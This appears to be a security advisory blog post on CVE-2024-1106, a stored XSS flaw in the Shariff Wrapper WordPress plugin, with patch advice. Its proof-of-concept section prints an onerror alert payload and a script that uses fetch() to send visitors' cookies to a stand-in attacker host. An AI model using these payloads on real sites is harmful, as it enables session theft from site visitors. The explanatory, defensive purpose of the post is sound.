CVE-2024-1106 - Shariff Wrapper WordPress Plugin XSS Vulnerability Explored

WordPress is one of the most popular ways to build a website. While WordPress plugins make adding features easy, they can sometimes introduce security risks if not coded securely. Recently, a vulnerability named CVE-2024-1106 was found in the widely-used Shariff Wrapper plugin. If you use this plugin, pay close attention—especially if you run a multisite WordPress setup!

What is CVE-2024-1106?

CVE-2024-1106 is a security flaw in the Shariff Wrapper plugin versions before 4.6.10. This bug allows users with high privileges, such as admins (even those without the unfiltered_html capability), to inject and store malicious scripts inside the website. This is known as a Stored Cross-Site Scripting (XSS) attack.

Normally, users without the unfiltered_html permission can’t put JavaScript or other risky code into posts or sites. However, due to a flaw in how some settings of Shariff Wrapper are not sanitized and not escaped, these restrictions can be bypassed on affected versions—even in multisite installations, where admins may have extra limitations.

Why Is This a Big Deal?

1. Stored XSS persists—Every visitor who views a page with the malicious content could be affected.
2. Multisite safe? Think again—Even WordPress admins with limited code permissions can exploit this if the plugin isn’t updated!

Broad reach—Shariff Wrapper is widely used for privacy-friendly social media sharing buttons.

If you’re running this vulnerable version, your site and its users could be at risk.

Technical Details

At the heart of the issue is poor handling of user settings in certain plugin fields. Instead of carefully cleaning (sanitizing) the input and making it safe to display (escaping), Shariff Wrapper simply trusts what’s given. This flaw means scripts and HTML can sneak through and get saved in the database.

Affected versions:
All versions before 4.6.10

Patched in:
4.6.10 and above

Example Exploit (Proof of Concept)

Suppose a multisite environment where an admin does not have unfiltered_html (by WordPress’s built-in restriction). The settings page for Shariff Wrapper allows entering certain values for buttons or custom services.

Exploit:

Entering a malicious payload in the plugin’s settings, like in the ‘Custom Title’ field

<img src="x" onerror="alert('XSS by CVE-2024-1106');">

Exfiltrating cookies or session data is also possible using similar payloads

<script>
fetch('https://attacker.com/steal?c='+document.cookie);
</script>

Once this payload is stored, all site visitors could unknowingly send their session or cookies to the attacker.

Mitigation and Update Steps

Immediate Fix:
Update Shariff Wrapper to the latest version, at least 4.6.10 or newer.

How to update:

Find “Shariff Wrapper” and click “Update Now.”

- Or Download the latest Shariff Wrapper

Important:
If you administer a multisite WordPress, update network-wide. Also, review plugin settings if you suspect tampering!

References & More Reading

- Original CVE Record: CVE-2024-1106
- Shariff Wrapper on WordPress.org
- Patch Notes for v4.6.10
- Wordfence Threat Intelligence
- OWASP XSS Guide

Conclusion

Even plugins you trust can become a risk with time. Always update your plugins, and pay special attention to multisite environments and permission settings.

If you’re on Shariff Wrapper before 4.6.10, patch this vulnerability now to keep your sites and visitors safe from XSS attacks like CVE-2024-1106.


*Stay secure, stay up-to-date! For exclusive tips and threat analysis, keep following our security reads.*

Timeline

Published on: 02/27/2024 09:15:37 UTC
Last modified on: 10/27/2024 23:35:01 UTC